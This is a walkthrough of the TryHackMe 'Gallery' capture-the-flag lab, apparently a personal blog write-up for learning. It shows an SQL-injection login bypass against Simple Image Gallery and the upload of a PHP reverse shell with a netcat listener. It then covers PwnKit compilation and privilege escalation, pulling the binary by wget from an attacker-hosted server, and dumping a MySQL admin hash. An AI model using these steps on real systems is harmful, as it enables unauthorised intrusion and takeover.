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Tryhackme Gallery Room Writeup

  • Penetration Testing methodology

    • Scanning
      • Nmap Scan
    • Enumeration
      • Enumerating HTTP Service
      • Searching Exploit
      • Testing Login page
    • Exploitation
      • Reading exploit code
      • Trying exploit code
      • Finding another way to exploit cms
      • Uploading shell
    • Privilege Escalation
      • Enumerating kernel make
      • Searching Exploit
      • Compiling exploit
      • Transferring Binary
      • Getting Root Shell
      • Getting Answers
  • Walkthrough

    • There are two flags to find in this room 1. User flag 2. Root flag

    • Scanning IP with Nmap we get following output 1  Initialscanning

      We can see that on port 80 and on port 8080 http service is running, By visiting to the IP:Port we can see that on port 8080 we see 2  Visiting Simple Gallery Page I tried a payload of SQLi in Username : " ' or 1=1 -- " & Password : " a " but didn't worked. 6  Running SQLi

      So the CMS is Simple Image Gallery after searching it for on searchsploit we get following output 3  Searching Exploits

      Copying the exploit to current directory. 4  Copying exploit

      It's a good practice to read exploit. Even if you don't understand try to read some parts of it what and how it's doing. [ My Takeaway ]

      Before finding something i ran the code to check how the exploit works. 5 4 Running Exploit

      So the code was allowing us to execute commands via a parameter called cmd and it was uploaded in gallery/uploads directory. So i visited on the provided url and found that the code was executing. The output of whoami command. 5 5 Running Exploit

      AFter a lot of tries to gain reverse shell through cmd parameter i was frustrated then in a try i read the code [ My Takeaway :D ] content as follows: 5 1 Reading Exploit 5 2 Reading Exploit 5 3 Reading Exploit

      While reading i encountered a line which seemed to me a SQLi payload see below : 6  Reading Exploit

      So i got a hint that the payload which i was trying to use was not working for this room so i tried the payload which was used in exploit. 6  Running simple cms exploit sqli payload And boooom !! i was not expecting this but it worked... 7  We r in

      OKK !! We are in so now while walking an application i found a page " Albums " So after visiting i saw upload functionality. 7 1 moving

      I thought let's give it a try to upload a PHP reverse shell by Pentest Monkey ( can be found in /usr/share/webshells/php/ or can be found on google coz it's famous revershell script so will be easy to find ).

      So edited my reverse shell with my IP and my favorite port 6  3 Editing shell IP BTW out-of-topic : I am using 1337 coz not of i am leet but i want to be leet XD #HECKUR MINDSET

      Uploading the PHP Reverse Shell and listening on localhost via nc -lvnp 1337 [ for me it's 1337 you use what you typed the port to in script ] 7 2 Upload shellcode

      Shell Uploaded successfully !!!! 7 3 Shell uploaded

      By clicking on the script you uploaded you can activate the shell. But don't forget to listen before you activated the shell. 9 got shell

      Whoop Whoop we got shell... OKKK first things first let's stabilise our shell. I learned stabilising from What the Shell room on Tryhackme.

      • export TERM=xterm
      • which python3 [ Will allow to know what python is installed ]
      • python3 -c 'import pty;pty.spawn("/bin/bash")'
      • press CTRL+Z to bcakground the shell and also run the command on attacker machine
      • stty raw -echo ; fg
      • reset
      • [ This commands will give us a fully functional shell ] 9 1 Stabilising shell By resetting you get your shell reset like below a clean shell :D
  • Privilege Escalation TIIIIIIIIIIIME !!!!

    • For privesc you can run linpeas or any other script or may enumerate manually for escalation.

    • But in this writeup we will run PwnKit to learn some new about POLKIT pkexec module exploit. The exploit code can be found here -> 10  enumerating privesc

    • Let's do this... Compiling the code by

    • gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC 11  1 pkexec binary We got the binary compiled and now let's move this to victim host.

      • 1st host a server on attacker machine we can do this by [Note : Host the server where your binary file is ! ]
        • Command : python3 -m http.server 80
      • 2nd Go to victim terminal and download the binary by following
        • Command : wget http://[attackerIP:PORT]/file_name 12  Tranferring binary

          Also note the workding directory i am in /dev/shm. You must have a writable permission on a directory. Like /tmp or /dev/shm or /var/tmp Now we got the binary so let's make it executable by using command :

          • chmod +x PwnKit Let's now run the binary 13  Got Shell

      Controlling Emotions of getting root shell ;-; So let's get the flags and end it ASAP.

      • /home/mike has user.txt
      • /root/ has root.txt 13  Flags txt Also we need hash of an admin user to complete the room
      • Use command netstat -altuopn for checking the services runnning on localhost
      • We can see 3306 is running which is mysql port.
      • Using mysql -u root -p [use password as root]
      • accessing the database.
      • and we got the admin hash submitting it and ok the room has been completed. 14  databases 14 2 databases 14 3 database hash

If any suggestions please advice.


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